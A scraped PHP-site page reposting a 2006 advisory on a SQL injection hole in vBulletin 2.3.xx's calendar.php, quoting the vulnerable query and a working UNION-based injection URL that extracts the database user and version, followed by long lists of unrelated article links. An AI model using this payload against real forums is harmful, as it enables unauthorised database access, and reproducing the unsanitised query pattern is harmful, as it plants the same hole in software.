vBulletin Forum 2.3.xx SQL Injection


Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

PHP 相关文章推荐
用PHP和ACCESS写聊天室(三)
Oct 09 PHP
Discuz!下Memcache缓存实现方法
May 28 PHP
PHP+MySQL投票系统的设计和实现分享
Sep 23 PHP
解析CodeIgniter自定义配置文件
Jun 18 PHP
php多用户读写文件冲突的解决办法
Nov 06 PHP
destoon安全设置中需要设置可写权限的目录及文件
Jun 21 PHP
推荐25款php中非常有用的类库
Sep 29 PHP
php中smarty实现多模版网站的方法
Jun 11 PHP
php实现模拟post请求用法实例
Jul 11 PHP
thinkPHP中_initialize方法实例分析
Dec 05 PHP
PHP检查URL包含特定字符串实例方法
Feb 11 PHP
Thinkphp 框架扩展之标签库驱动原理与用法分析
Apr 23 PHP
PHP_Flame(Version:Progress)的原代码
Oct 09 #PHP
图形数字验证代码
Oct 09 #PHP
用PHP函数解决SQL injection
Oct 09 #PHP
session 的生命周期是多长
Oct 09 #PHP
做个自己站内搜索引擎
Oct 09 #PHP
用libTemplate实现静态网页的生成
Oct 09 #PHP
php注入实例
Oct 09 #PHP
You might like
php判断字符以及字符串的包含方法属性
2008/08/30 PHP
php INI配置文件的解析实现分析
2011/01/04 PHP
解析php中static,const与define的使用区别
2013/06/18 PHP
PHP自带函数给数字或字符串自动补齐位数
2014/07/29 PHP
php使用cookie保存用户登录的用户名实例
2015/01/26 PHP
JavaScript DOM 学习第七章 表单的扩展
2010/02/19 Javascript
Javascript 设计模式(二) 闭包
2010/05/26 Javascript
document.write()及其输出内容的样式、位置控制
2013/08/12 Javascript
谈谈我对JavaScript原型和闭包系列理解(随手笔记6)
2015/12/20 Javascript
详解自动生成博客目录案例
2016/12/09 Javascript
jQuery读取XML文件的方法示例
2017/02/03 Javascript
jQuery常用选择器详解
2017/07/17 jQuery
js实现轮播图的两种方式(构造函数、面向对象)
2017/09/30 Javascript
JS异步函数队列功能实例分析
2017/11/28 Javascript
vue回到顶部监听滚动事件详解
2019/08/02 Javascript
javascript绘制简单钟表效果
2020/04/07 Javascript
Node登录权限验证token验证实现的方法示例
2020/05/25 Javascript
从表单校验看JavaScript策略模式的使用详解
2020/10/17 Javascript
[01:31](回顾)杀出重围,决战TI之巅
2014/07/01 DOTA
修改Python的pyxmpp2中的主循环使其提高性能
2015/04/24 Python
linux下python抓屏实现方法
2015/05/22 Python
解决python有时候import不了当前的包问题
2019/08/28 Python
Python利用Faiss库实现ANN近邻搜索的方法详解
2020/08/03 Python
python自动化发送邮件实例讲解
2021/01/04 Python
浅谈盘点5种基于Python生成的个性化语音方法
2021/02/05 Python
css3强大的动画效果animate使用说明及浏览器兼容介绍
2013/01/09 HTML / CSS
C++面试题:关于链表和指针
2013/06/05 面试题
最新党员的自我评价分享
2013/11/04 职场文书
六查六看自查材料
2014/02/17 职场文书
文化宣传方案
2014/03/13 职场文书
诉讼代理人授权委托书
2014/10/11 职场文书
餐厅服务员岗位职责
2015/02/09 职场文书
开天辟地观后感
2015/06/09 职场文书
天那边观后感
2015/06/09 职场文书
Python学习之迭代器详解
2022/04/01 Python
微信小程序纯CSS实现无限弹幕滚动效果
2022/09/23 HTML / CSS